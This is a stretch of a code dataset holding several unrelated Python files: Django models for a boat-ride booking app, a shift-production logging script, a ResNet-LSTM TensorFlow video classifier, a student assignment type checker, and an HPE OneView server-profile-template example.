self.data_chamada:\n self.status = 3\n else:\n self.status = 0\n\n super(Viagem, self).save(*args, **kwargs)\n\n def preco_total(self):\n\n if self.preco and self.preco > 0:\n return self.preco * self.quantidade\n else:\n return 0\n\n\n def chamada_json(self):\n\n chamada = {}\n chamada['data_chamada'] = self.data_chamada.isoformat()\n chamada['embarque'] = self.embarque\n chamada['quantidade'] = self.quantidade\n chamada['embarque_lat'] = float(self.embarque_lat_long.split(\", \")[0])\n chamada['embarque_lng'] = float(self.embarque_lat_long.split(\", \")[1])\n chamada['desembarque'] = self.desembarque\n if self.desembarque_lat_long:\n chamada['desembarque_lat'] = float(self.desembarque_lat_long.split(\", \")[0])\n chamada['desembarque_lng'] = float(self.desembarque_lat_long.split(\", \")[1])\n chamada['quantidade'] = self.quantidade\n chamada['passageiro_nome'] =self.passageiro.nome\n chamada['tempo_de_espera'] = self.tempo_espera_lista_chamada()\n chamada['cor'] = self.cor\n chamada['pk'] = self.pk\n\n return chamada\n\n def aceite_json(self):\n\n aceite = self.chamada_json()\n aceite['aceite_piloto'] = self.aceite_piloto\n\n if self.barco:\n aceite['barco'] = self.barco.to_json()\n else:\n aceite['barco'] = None\n\n if self.piloto:\n aceite['piloto'] = self.piloto.to_json()\n else:\n aceite['piloto'] = None\n\n if self.data_embarque:\n aceite['data_embarque'] = self.data_embarque\n else:\n aceite['data_embarque'] = None\n\n if self.data_desembarque:\n aceite['data_desembarque'] = self.data_desembarque\n else:\n aceite['data_desembarque'] = None\n\n aceite['tempo_de_espera'] = self.tempo_de_espera()\n\n if self.preco:\n aceite['preco'] = str(self.preco).replace(\".\", \",\")\n aceite['total'] = str(self.preco * self.quantidade).replace(\".\", \",\")\n aceite['preco_pk'] = self.preco_model.pk\n\n else:\n aceite['preco_pk'] = None\n aceite['preco'] = None\n aceite['total'] = None\n\n return aceite\n\n def tempo_espera_lista_chamada(self):\n\n if self.data_chamada and not self.data_embarque:\n remain = datetime.datetime.today() - self.data_chamada\n minutes, seconds = divmod(remain.seconds, 60)\n if minutes > 0:\n return \"{0}m\".format(minutes, seconds)\n elif minutes == 0 and seconds > 0:\n return \"{0}s\".format(seconds)\n else:\n return 0\n\n def espera_min_sec(self):\n if self.data_embarque and self.data_chamada:\n remain = self.data_embarque - self.data_chamada\n minutes, seconds = divmod(remain.seconds, 60)\n return {\"min\": minutes, \"sec\": seconds}\n elif self.data_chamada and not self.data_embarque:\n remain = datetime.datetime.today() - self.data_chamada\n minutes, seconds = divmod(remain.seconds, 60)\n return {\"min\": minutes, \"sec\": seconds}\n\n def tempo_de_espera(self):\n\n t = self.espera_min_sec()\n if t:\n if t['min'] > 0 and t['sec'] > 0:\n return \"{0}m:{1}s\".format(t['min'], t['sec'])\n elif t['min'] == 0 and t['sec'] > 0:\n return \"{0}s\".format(t['sec'])\n elif t['min'] > 0 and t['sec'] == 0:\n return \"{0}m\".format(t['min'])\n\n elif self.data_chamada and not self.data_embarque:\n\n if t['min'] > 0 and t['sec'] > 0:\n return \"Esperando: {0}m:{1}s\".format(t['min'], t['sec'])\n elif t['min'] == 0 and t['sec'] > 0:\n return \"Esperando: {0}s\".format(t['sec'])\n elif t['min'] > 0 and t['sec'] == 0:\n return \"Esperando: {0}m\".format(t['min'])\n\n def resumo_json(self):\n\n v = {}\n v[\"preco\"] = self.preco\n v[\"preco_total\"] = str(self.preco * self.quantidade).replace(\".\", \",\")\n v[\"quantidade\"] = self.quantidade\n v[\"tempo_espera\"] = self.tempo_de_espera()\n v[\"embarque\"] = self.embarque\n v[\"desembarque\"] = self.desembarque\n v[\"nota_classificacao\"] = self.nota_classificacao\n\n if self.piloto:\n v[\"piloto\"] = self.piloto.nome\n else:\n v[\"piloto\"] = None\n if self.barco:\n v[\"barco\"] = self.barco.nome\n else:\n v[\"barco\"] = None\n if self.data_embarque:\n v[\"data_embarque\"] = self.data_embarque.strftime(\"%d/%m/%Y %H:%M\")\n else:\n v[\"data_embarque\"] = None\n\n\n\n return v\n\n\n def __unicode__(self):\n return u\"{0} - {1} - {2}pax\".format(self.data_chamada.strftime(\"%d/%m/%Y %H:%M\"), self.passageiro.nome, self.quantidade)\n\n class Meta:\n verbose_name_plural = 'Viagens'\n\n\nclass DesistenciaPiloto(models.Model):\n\n piloto = models.ForeignKey(Piloto, null=True, blank=True)\n viagem = models.ForeignKey(Viagem, null=True, blank=True, on_delete=models.SET_NULL)\n motivo = models.TextField(null=True, blank=True)\n data_desistencia = models.DateTimeField(auto_now_add=True, null=True, blank=True)\n\n class Meta:\n verbose_name = 'Desistência piloto'\n verbose_name_plural = 'Desistências piloto'\n\nclass DesistenciaPassageiro(models.Model):\n\n passageiro = models.ForeignKey(Passageiro, null=True, blank=True)\n viagem = models.ForeignKey(Viagem, null=True, blank=True, on_delete=models.SET_NULL)\n data_desistencia = models.DateTimeField(auto_now_add=True, null=True, blank=True)\n piloto = models.ForeignKey(Piloto, null=True, blank=True, on_delete=models.SET_NULL)\n\n class Meta:\n verbose_name = 'Desistência passageiro'\n verbose_name_plural = 'Desistências passageiro'\n\n\n'''\n\n$scope.localizacao_barco_fake = [\n\"-23.004665, -43.307942\",\n\"-23.005258, -43.308468\",\n\"-23.005544, -43.309712\",\n\"-23.005406, -43.310774\",\n\"-23.005050, -43.311289\",\n\"-23.004527, -43.311783\",\n\"-23.003737, -43.311729\",\n\"-23.003194, -43.311472\",\n\"-23.002670, -43.311086\",\n\"-23.002028, -43.310828\",\n\"-23.001366, -43.310549\",\n\"-23.001070, -43.310217\",\n\"-23.001080, -43.309380\",\n\"-23.001031, -43.308682\",\n\"-23.001001, -43.307674\",\n\"-23.001574, -43.307137\",\n\"-23.002591, -43.307180\",\n\"-23.003608, -43.307524\",\n\"-23.004142, -43.307770\"\n];\n'''\n\n","sub_path":"website/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":14561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"640199994","text":"# Shipheus\n# 4/10/18\n# MicroDon.py\n\nimport datetime\n\n###################START FUNCTIONS###################################\ndef newPage():\n print('\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n')\n\ndef inquire():\n area = int(input('''\\nPlease choose work area.\n *********\n 1. MGB\n 2. Topcoat\n 3. Dress\n **********\n '''))\n if (area == 2):\n booth = input('What booth? ')\n else:\n booth = ''\n if(area == 1):\n mask = input('How many parts did you mask? \\n')\n grit = input('How many parts did you grit blast? \\n')\n bond = input('How many parts did you bond coat? \\n')\n eos = ''\n bos = ''\n p_s = ''\n p_f = ''\n else:\n bos = int(input('''\\nWas there a part in process at the beginning of shift?\n **********\n 1- yes\n 2- no\n **********\n '''))\n p_s = int(input('How many parts did you start? \\n')) #parts_start\n p_f = int(input('How many parts did you finish? \\n'))#parts_finish\n eos = int(input('''\\nWas there a part in process at the end of shift?\n **********\n 1- yes\n 2- no\n **********\n '''))\n mask = ''\n grit = ''\n bond = ''\n return area, bos, p_s, p_f, eos, mask, grit, bond, booth\n\ndef decode(shift, area, bos, p_s, p_f, eos, mask, grit, bond, booth):\n shift = shift + ' shift'\n if(area == 1):\n area = 'MGB'\n mask = mask + ' parts masked.'\n grit = grit + ' parts gritblasted.'\n bond = bond + ' parts bondcoated.'\n p_s = ''\n p_f = ''\n elif(area == 2):\n area = 'Topcoat'\n booth = 'Booth ' + str(booth)\n else:\n area = 'Dress'\n if(bos == 1):\n bos = 'There was part in progress at bos.'\n elif(bos == 2):\n bos = ''\n if(eos == 1):\n eos = 'There was a part in progress at eos.'\n elif(eos == 2):\n eos = ''\n if(area != 'MGB'):\n p_s = str(p_s) + ' parts started.'\n p_f = str(p_f) + ' parts finished.'\n return area, bos, eos, mask, grit, bond, p_s, p_f, booth\n \ndef preview(shift, area, bos, p_s, p_f, eos, mask, grit, bond, booth):\n print('\\n************************************\\n\\n' \\\n + str(datetime.date.today()) + ' \\n' + shift)\n print('Area: ' + area)\n if(area == 'Topcoat'):\n print(booth)\n print()\n if(area == 'MGB'):\n print(mask)\n print(grit)\n print(bond)\n if(bos != ''):\n print(bos)\n if(area != 'MGB'):\n print(p_s)\n print(p_f)\n if(eos != ''):\n print(eos)\n print('\\n************************************')\n \ndef output(shift, trapdoor, gdopt, area, bos, p_s, p_f, eos, mask, grit, bond, booth, fileName):\n if(trapdoor == '' and gdopt == 1): \n f = open(fileName + '.txt','a')\n outPut = (str(datetime.date.today()) \\\n + ' :: ' + shift + ' :: Area: ' + area + ':: ' + booth +'\\n\\n' + mask + ': '\\\n + grit + ': ' + bond + ': ' + bos + ': ' + p_s + ': ' + p_f + ': ' + eos \\\n + '\\n' + '************************************\\n')\n f.write(outPut)\n f.close()\n\ndef admin(fileName):\n boss = input('''\\nWelcome Leadman,\nWhat would you like to do?\\n\n1- View production\n2- clear all\\n''')\n \n if(boss == '1'):\n f = open(fileName + '.txt', 'r')\n show = f.read()\n print('\\n************************************\\n' + show)\n f.close()\n elif(boss == '2'):\n safe = input(\"\\nAre you sure?\\n1 = yes\\n2 = no\\n\")\n if(safe == '1'):\n f = open(fileName + '.txt', 'w')\n f.write('')\n f.close()\n else:\n print('clear all aborted.') \n\ndef main():\n gdopt = 2\n \n # Name file\n if (datetime.datetime.now().hour >= 0 and datetime.datetime.now().hour < 7):\n shift = '3rd Shift'\n elif (datetime.datetime.now().hour >= 7 and datetime.datetime.now().hour <= 15 ):\n if (datetime.datetime.now().hour == 15 and datetime.datetime.now().minute >= 30):\n shift = '2nd Shift'\n else:\n shift = '1st Shift'\n else:\n shift = '2nd Shift'\n \n fileName = str(datetime.date.today()) + '-' + shift\n \n trapdoor = 'pizza'\n \n print(\"Let's see what you've done today.\")\n trapdoor = input(\"Press enter to continue.\\n\")\n while (trapdoor != \"\" and trapdoor != 'theprodigaldon'):\n trapdoor = input(\"\\nError: try again.\\nPress enter to continue.\")\n while (trapdoor != \"theprodigaldon\" and gdopt != 1):\n area, bos, p_s, p_f, eos, mask, grit, bond, booth = inquire()\n area, bos, eos, mask, grit, bond, p_s, p_f, booth = decode(shift, area, bos, p_s, p_f, eos, mask, grit, bond, booth)\n preview(shift, area, bos, p_s, p_f, eos, mask, grit, bond, booth)\n gdopt = int(input('''\\nDoes this look right?\n **********\n 1- yes\n 2- no\n **********\n '''))\n if(gdopt == 1):\n output(shift, trapdoor, gdopt, area, bos, p_s, p_f, eos, mask, grit, bond, booth, fileName)\n \n if(trapdoor == \"theprodigaldon\"):\n admin(fileName)\n lchance = input('\\nWhat would you like to do next?\\n1 = Exit\\n2 = Rerun\\n')\n if(lchance == '1'):\n print('\\nThanks for using MicroDon, Goodbye.')\n return lchance\n \n##############################END FUNCTIONS####################################\n\nlchance = '2'\nwhile(lchance == '2'):\n lchance = main()\n","sub_path":"MicroDon.proj/MicroDon.py","file_name":"MicroDon.py","file_ext":"py","file_size_in_byte":5401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"566108456","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nAuthor:XiyouZhaoC\nResidual network and LSTM\nthis code running on tensorflow 0.10.0 platform\nBy using residual network(ResNet38)(CNN) to extract features and\n using LSTM(single layer LSTM) to process sequence data\n\nUFC11 dataset contains 1600 videos and hava been classified 11 classes \n\"\"\"\nimport tensorflow as tf\nimport process_data as pd\nimport sys\n\nfrom collections import namedtuple\nfrom math import sqrt\n\n\n# Dataset count\nn_train_example = 33528\nn_test_example = 4872\n\n# Network Parameter\nlearning_rate = 0.001\n\npic_batch_size = 2400 # % fps == 0\nfps = 24\nvideo_batch_size = pic_batch_size / fps\nn_classes = 11\n\n\n# LSTM Parameter\nn_hidden_units = 384\n\n\n\"\"\"\n2D COnvolution with options for kernel size,stride and init deviation\nx:tensor--input tensor to convolution\nn_filters:int--Number of filters to apply\nk_h,k_w:int--kernel height/width\nstride_h,stride_w:int---Stride in rows/cols\nstddev:float--Initialization's standard deviation\nactivation:arguments--Function which applies a nonlinearity\npadding:str--'SAME' or 'VALID'\n\"\"\" \ndef conv2d(x,\n n_filters,\n k_h=5,k_w=5,\n stride_h=2,stride_w=2,\n stddev=0.1,\n activation=None,\n bias=True,\n padding='SAME',\n name='Conv2D'):\n with tf.variable_scope(name):\n w = tf.get_variable(\n 'w',[k_h,k_w,x.get_shape()[-1],n_filters],\n initializer=tf.truncated_normal_initializer(stddev=stddev))\n conv = tf.nn.conv2d(x,w,\n strides=[1,stride_h,stride_w,1],\n padding=padding)\n if bias:\n b = tf.get_variable('b',\n [n_filters],\n initializer=tf.truncated_normal_initializer(stddev=stddev))\n conv = tf.nn.bias_add(conv,b)\n if activation:\n conv = activation(conv)\n return conv \n\ndef residual_network(x,\n activation=tf.nn.relu):\n LayerBlock = namedtuple(\n 'LayerBlock',['num_repeats','num_filters','bottleneck_size'])\n blocks = [LayerBlock(3,128,32),\n LayerBlock(3,256,64),\n LayerBlock(3,512,128),\n LayerBlock(3,1024,256)]\n input_shape = x.get_shape().as_list()\n \n if len(input_shape) == 2:\n ndim = int(sqrt(input_shape[1]))\n if ndim*ndim!=input_shape[1]:\n raise ValueError('input_shape should be square')\n x = tf.reshape(x,[-1,ndim,ndim,1])\n \n print('input layer,shape = {0}'.format(x.get_shape()))#[batch_size,28,28,1] \n # First convolution expands to 64 channels and downsamples\n net = conv2d(x,64,k_h=7,k_w=7,\n name='conv1',activation=activation)#padding=SAME,stride=2\n print('conv1,shape = {0}'.format(net.get_shape()))#[batch_size,14,14,64]\n \n # Max Pool 3*3 kernel pool,stride=2,padding=SAME(kernel-1)/2\n net = tf.nn.max_pool(net,[1,3,3,1],\n strides=[1,2,2,1],padding='SAME')\n print('max pool1,shape = {0}'.format(net.get_shape()))#[batch,7,7,64]\n \n # Setup first chain of resnets 1*1卷积\n net = conv2d(net,blocks[0].num_filters,k_h=1,k_w=1,\n stride_h=1,stride_w=1,padding='VALID',name='conv2')\n print('conv2,shape = {0}'.format(net.get_shape()))#[batch,7,7,128]\n \n print('Residual Networds:')\n # Loop through all res blocks\n for block_i,block in enumerate(blocks):\n for repeat_i in range(block.num_repeats):\n name = 'block_%d/repeat_%d'%(block_i,repeat_i)\n \n print('{0} start......'.format(name))\n \n conv = conv2d(net,block.bottleneck_size,k_h=1,k_w=1,\n stride_h=1,stride_w=1,padding='VALID',\n activation=activation,\n name=name+'/conv_in')\n print('{0}/conv_in,shape = {1}'.format(name,conv.get_shape()))\n #!*1卷积[batch,7,7,bottleneck_size]\n \n conv = conv2d(conv,block.bottleneck_size,k_h=3,k_w=3,\n padding='SAME',stride_h=1,stride_w=1,\n activation=activation,\n name=name+'/conv_bottlneck')\n print('{0}/conv_bottleneck,shape = {1}'.format(name,conv.get_shape()))\n #3*3卷积[batch,7,7,bottlneck_size](stride=1,padding=SAME卷积之后维度不变)\n \n conv = conv2d(conv,block.num_filters,k_h=1,k_w=1,\n padding='VALID',stride_h=1,stride_w=1,\n activation=activation,\n name=name+'/conv_out')\n print('{0}/conv_out,shape = {1}'.format(name,conv.get_shape()))\n #1*1卷积[batch,7,7,num_filters]\n \n net = conv + net\n print('{0}/merge,shape = {1}'.format(name,net.get_shape))\n #[batch,7,7,num_filters]\n \n try:\n print('===========================================================')\n print('Next Block (Upscale)')#增加维度\n next_block = blocks[block_i+1]\n name_s = 'block_{0}/conv_upscale'.format(block_i)\n net = conv2d(net,next_block.num_filters,k_h=1,k_w=1,\n padding='SAME',stride_h=1,stride_w=1,bias=False,name=name_s)\n print('{0},shape = {1}'.format(name_s,net.get_shape()))\n except IndexError:\n pass\n \n # Average Pool\n net = tf.nn.avg_pool(net,\n ksize=[1,net.get_shape().as_list()[1],\n net.get_shape().as_list()[2],1],\n strides=[1,1,1,1],padding='VALID')\n print('Average Pool,shape = {0}'.format(net.get_shape()))# 7*7均值采样\n net = tf.reshape(\n net,\n [-1, net.get_shape().as_list()[1] *\n net.get_shape().as_list()[2] *\n net.get_shape().as_list()[3]])\n print('After residual network shape = {0}'.format(net.get_shape()))\n \n return net\n\n\n \ndef lstm_layer(x):\n \n print('============================LSTM==================================')\n \n # x :[pic_batch_size,1024]\n # transpose to [video_batch_size,fps,1024]\n # get input \n n_inputs = x.get_shape().as_list()[-1]\n print('LSTM Layer n_inputs={0}'.format(n_inputs)) \n\n # Define weights\n weights = {\n #(n_inpus=1024,n_hidden_units=128)\n 'in':tf.Variable(tf.random_normal([n_inputs,n_hidden_units])),\n #(n_hidden_units=128,n_classes=11)\n 'out':tf.Variable(tf.random_normal([n_hidden_units,n_classes]))\n }\n biases = {\n #(n_hidden_units=128,)\n 'in':tf.Variable(tf.constant(0.1,shape=[n_hidden_units,])),\n #(n_classes=11,)\n 'out':tf.Variable(tf.constant(0.1,shape=[n_classes,]))\n }\n \n # x[pic_batch,n_inputs] ==> [video_batch_size,fps,n_inputs]\n x = tf.reshape(x,[-1,fps,n_inputs])\n # x[video_batch_size,fps,n_inputs] ==> [video_batch_size * fps,n_inputs]\n x = tf.reshape(x,[-1,n_inputs])\n # x_in ==> (video_batch_size * fps,n_hidden_units)\n x_in = tf.matmul(x,weights['in']) + biases['in']\n # x_in ==> (video_batch_size,fps,n_hidden_units)\n x_in = tf.reshape(x_in,[-1,fps,n_hidden_units])\n \n # cell\n # forget_bias = 1.0 represents all information can through lstm\n lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(n_hidden_units,\n forget_bias=1.0,\n state_is_tuple=True)\n _init_state = lstm_cell.zero_state(video_batch_size,dtype=tf.float32)\n outputs,states = tf.nn.dynamic_rnn(lstm_cell,\n x_in,\n initial_state=_init_state,\n time_major=False\n )\n #==================================DUBUG===================================\n \n #[10,24,128][video_batch_size,fps,n_hidden_units]\n print('After LSTM layer dynamic run,output shape = {0}'.format(outputs.get_shape()))\n # \n # print(type(states))\n # print('!! 2',states.get_shape())\n #==================================DUBUG===================================\n \n # unpack to list[(video_batch_size,outpits)*fps]\n # transpose:[video_batch_size,fps,n_hidden_units]\n # ==> [fps,video_batch_size,n_hidden_units]\n outputs = tf.unpack(tf.transpose(outputs,[1,0,2]))\n #==================================DUBUG=================================== \n # print(type(outputs))#list \n # print(len(outputs))# fps\n # print(outputs[0].get_shape())#[video_batch_size,n_hidden_units]\n #经过上述转换,output变成了[(batch,outputs)* steps]的list,outputs[-1]表示最后一个\n #step运行之后LSTM单元输出的结果,之后使用SOFTMAX回归即可得到相应的分类结果数据\n #==================================DUBUG===================================\n \n results = tf.matmul(outputs[-1],weights['out']) + biases['out']\n return results\n \ndef train_res_lstm(width=256,height=256):\n print('...... loading the dataset ......')\n train_set_x,train_set_y,test_set_x,test_set_y = pd.load_data_set(width,height)\n \n print('...... building the model ......')\n x = tf.placeholder(tf.float32,[None,width*height])\n y = tf.placeholder(tf.float32,[None,n_classes])\n y_res = residual_network(x)\n y_pred = lstm_layer(y_res)\n \n # Define loss and training functions\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(y_pred,y))\n optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)\n \n # Monitor Accuracy\n correct_prediction = tf.equal(tf.argmax(y_pred,1),tf.argmax(y,1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))\n\n best_acc = 0.\n \n init = tf.initialize_all_variables()\n # Session\n with tf.Session() as sess:\n print('...... initializating varibale ...... ')\n sess.run(init)\n \n n_epochs = 100\n print('...... start to training ......')\n for epoch_i in range(n_epochs):\n # Training \n train_accuracy = 0.\n for batch_i in range(n_train_example//pic_batch_size):\n \n batch_xs = train_set_x[batch_i*pic_batch_size:(batch_i+1)*pic_batch_size]\n batch_ys = train_set_y[batch_i*video_batch_size:(batch_i+1)*video_batch_size]\n _,loss,acc = sess.run([optimizer,cost,accuracy],\n feed_dict={\n x:batch_xs,\n y:batch_ys}\n )\n #print('epoch:{0},minibatch:{1},y_res:{2}'.format(epoch_i,batch_i,yy_res))\n #print('epoch:{0},minibatch:{1},y_pred:{2}'.format(epoch_i,batch_i,yy_pred))\n print('epoch:{0},minibatch:{1},cost:{2},train_accuracy:{3}'.format(epoch_i,batch_i,loss,acc))\n train_accuracy += acc\n\n train_accuracy /= (n_train_example//pic_batch_size)\n print('----epoch:{0},training acc = {1}'.format(epoch_i,train_accuracy))\n \n # Validation\n valid_accuracy = 0.\n for batch_i in range(n_test_example//pic_batch_size):\n batch_xs = test_set_x[batch_i*pic_batch_size:(batch_i+1)*pic_batch_size]\n batch_ys = test_set_y[batch_i*video_batch_size:(batch_i+1)*video_batch_size]\n valid_accuracy += sess.run(accuracy,\n feed_dict={\n x:batch_xs,\n y:batch_ys})\n valid_accuracy /= (n_test_example//pic_batch_size)\n print('epoch:{0},train_accuracy:{1},valid_accuracy:{2}'.format(epoch_i,train_accuracy,valid_accuracy))\n if(train_accuracy > best_acc):\n best_acc = train_accuracy\n \n print('...... training finished ......')\n print('...... best accuracy{0} ......'.format(best_acc))\n\n\nif __name__ == '__main__':\n \n if sys.argv[1]:\n if sys.argv[2]:\n print('...... training res and lstm network:width = {0},height = {1}'.format(sys.argv[1],sys.argv[2]))\n w = int(sys.argv[1])\n h = int(sys.argv[2])\n train_res_lstm(width=w,height=h)\n else: \n print('...... training res and lstm default net:width = 256,height = 256')\n train_res_lstm()\n","sub_path":"UFC11/ufc11_res_lstm.py","file_name":"ufc11_res_lstm.py","file_ext":"py","file_size_in_byte":12676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"252916798","text":"import sys\nsys.path.insert(0, 'pyta')\n\nprint(\"================= Start: checking coding style =================\")\n\nimport python_ta\npython_ta.check_all('admission_functions.py', config='pyta/a1_pyta.txt')\n\nprint(\"================= End: checking coding style =================\\n\")\n\nprint(\"================= Start: checking parameter and return types =================\")\n\nimport builtins\n\n# Check for use of functions print and input.\n\n# IMPORTANT!\n# If you are getting a syntax error here for the line:\n# our_print = print\n# Then you are using the wrong version of Python! \nour_print = print\nour_input = input\n\n\ndef disable_print(*args):\n raise Exception(\"You must not call print anywhere in your code!\")\n\ndef disable_input(*args):\n raise Exception(\"You must not call input anywhere in your code!\")\n\n\nbuiltins.print = disable_print\nbuiltins.input = disable_input\n\nimport admission_functions as af\n\n# Get the initial values of the constants\nconstants_before = [af.SPECIAL_CASE_SCHOOL_1,\n af.SPECIAL_CASE_SCHOOL_2,\n af.SPECIAL_CASE_YEAR]\n\n\nresult = af.is_special_case('Jacqueline Smith,Best High School,2002,MAT,90,94,ENG,92,88,CHM,80,85,BArts')\nassert isinstance(result, bool), \\\n '''af.is_special_case should return a bool, but returned {0}\n '''.format(type(result))\n\n\n# Type check af.get_final_mark\nrecord = 'Paul Gries,Ithaca High School,1986,BIO,60,70,CHM,80,90,CAT,10,20,BEng'\nresult = af.get_final_mark(record, '10', '20')\nassert isinstance(result, float), \\\n '''af.get_final_mark should return a float, but returned {0}\n '''.format(type(result))\n\n\n# Type check af.get_both_marks\nresult = af.get_both_marks('ABC,10,20', 'ABC')\nassert isinstance(result, str), \\\n '''af.get_both_marks should return a str, but returned {0}\n '''.format(type(result))\n\n\n# Type check af.extract_course\nresult = af.extract_course('ABC,10,20', 1)\nassert isinstance(result, str), \\\n '''af.extract_course should return a str, but returned {0}\n '''.format(type(result))\n\n\n# Type check af.applied_to_degree\nrecord = 'Paul Gries,Ithaca High School,1986,BIO,60,70,CHM,80,90,CAT,95,96,BEng'\nresult = af.applied_to_degree(record, 'BEng')\nassert isinstance(result, bool), \\\n '''af.applied_to_degree should return a bool, but returned {0}\n '''.format(type(result))\n\n\n# Type check af.decide_admission\nvalid_strings = ['accept', 'reject', 'accept with scholarship']\nfor x in [18, 22, 30]:\n result = af.decide_admission(x, 20)\n assert isinstance(result, str), \\\n '''af.decide_admission should return a str, but returned {0}\n '''.format(type(result))\n assert result.strip().lower() in valid_strings, \\\n '''af.decide_admission should return one of {0}, but returned {1}\n '''.format(\"'\" + \"', '\".join(valid_strings) + \"'\", \"'\" + result + \"'\")\n\nbuiltins.print = our_print\nbuiltins.input = our_input\n\nprint(\"================= End: checking parameter and return types =================\\n\")\n\nprint(\"================= Start: checking whether constants are unchanged =================\")\n\n# Get the final values of the constants\nconstants_after = [af.SPECIAL_CASE_SCHOOL_1,\n af.SPECIAL_CASE_SCHOOL_2,\n af.SPECIAL_CASE_YEAR]\n\n\n# Check whether the constants are unchanged.\nassert constants_before == constants_after, \\\n \"\"\"Your function(s) modified the value of a constant(s). Edit your code\n so that the values of constants are unchanged by your functions.\"\"\"\nprint(\"================= End: checking whether constants are unchanged =================\\n\")\n\n\n\nprint(\"The parameter and return type checker passed.\")\nprint(\"This means we will be able to test your code.\")\nprint(\"It does NOT mean your code is necessarily correct.\")\nprint(\"You should run your own thorough tests to convince yourself your code is correct.\")\nprint()\nprint(\"Scroll up to review the output of checking coding style.\")\n\n\n","sub_path":"2018summer/A1/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":3935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"611389906","text":"# -*- coding: utf-8 -*-\n###\n# (C) Copyright (2012-2019) Hewlett Packard Enterprise Development LP\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n###\n\nfrom pprint import pprint\nfrom hpOneView.oneview_client import OneViewClient\nfrom config_loader import try_load_from_file\n\nconfig = {\n \"ip\": \"\",\n \"credentials\": {\n \"userName\": \"\",\n \"password\": \"\"\n },\n \"api_version\": 800\n}\n\n# Try load config from a file (if there is a config file)\nconfig = try_load_from_file(config)\noneview_client = OneViewClient(config)\nprofile_templates = oneview_client.server_profile_templates\n\n# Dependency resources\nhardware_types = oneview_client.server_hardware_types\nenclosure_groups = oneview_client.enclosure_groups\n\n# These variables must be defined according with your environment\nserver_profile_name = \"ProfileTemplate101\"\nhardware_type_name = \"SY 480 Gen9 1\"\nenclosure_group_name = \"SYN03_EC\"\nhardware_type_for_transformation = \"SY 480 Gen9 2\"\nenclosure_group_for_transformation = \"SYN03_EC\"\n\nhardware_type = hardware_types.get_by_name(hardware_type_name)\nenclosure_group = enclosure_groups.get_by_name(enclosure_group_name)\n\n# Get all\nprint(\"\\nGet list of all server profile templates\")\nall_templates = profile_templates.get_all()\nfor template in all_templates:\n print(' %s' % template['name'])\n\n# Get Server Profile Template by scope_uris\nif oneview_client.api_version >= 600:\n server_profile_templates_by_scope_uris = profile_templates.get_all(\n scope_uris=\"\\\"'/rest/scopes/3bb0c754-fd38-45af-be8a-4d4419de06e9'\\\"\")\n if len(server_profile_templates_by_scope_uris) > 0:\n print(\"Found %d Server profile Templates\" % (len(server_profile_templates_by_scope_uris)))\n i = 0\n while i < len(server_profile_templates_by_scope_uris):\n print(\"Found Server Profile Template by scope_uris: '%s'.\\n uri = '%s'\" % (server_profile_templates_by_scope_uris[i]['name'],\n server_profile_templates_by_scope_uris[i]['uri']))\n i += 1\n pprint(server_profile_templates_by_scope_uris)\n else:\n print(\"No Server Profile Template found.\")\n\n# Get by property\nprint(\"\\nGet a list of server profile templates that matches the specified macType\")\ntemplate_mac_type = all_templates[1][\"macType\"]\ntemplates = profile_templates.get_by('macType', template_mac_type)\nfor template in templates:\n print(' %s' % template['name'])\n\n# Get available networks\nprint(\"\\nGet available networks\")\navailable_networks = profile_templates.get_available_networks(enclosureGroupUri=enclosure_group.data[\"uri\"],\n serverHardwareTypeUri=hardware_type.data[\"uri\"])\nprint(available_networks)\n\n# Get by name\nprint(\"\\nGet a server profile templates by name\")\ntemplate = oneview_client.server_profile_templates.get_by_name(server_profile_name)\nif template:\n pprint(template.data)\nelse:\n # Create a server profile template\n print(\"Create a basic connection-less server profile template \")\n basic_template_options = dict(\n name=server_profile_name,\n serverHardwareTypeUri=hardware_type.data[\"uri\"],\n enclosureGroupUri=enclosure_group.data[\"uri\"]\n )\n template = profile_templates.create(basic_template_options)\n pprint(template.data)\n\n# Update bootMode from recently created template\nprint(\"\\nUpdate bootMode from recently created template\")\ntemplate_to_update = template.data.copy()\ntemplate_to_update[\"bootMode\"] = dict(manageMode=True, mode=\"BIOS\")\ntemplate.update(template_to_update)\npprint(template.data)\n\n# Get new profile\nprint(\"\\nGet new profile\")\nprofile = template.get_new_profile()\npprint(profile)\n\nif oneview_client.api_version >= 300:\n # Get server profile template transformation\n print(\"\\nGet a server profile template transformation\")\n hardware = hardware_types.get_by_name(hardware_type_for_transformation)\n enclosure_group = enclosure_groups.get_by_name(enclosure_group_for_transformation)\n\n transformation = template.get_transformation(hardware.data[\"uri\"],\n enclosure_group.data[\"uri\"])\n pprint(transformation)\n\n# Delete the created template\nprint(\"\\nDelete the created template\")\ntemplate.delete()\nprint(\"The template was successfully 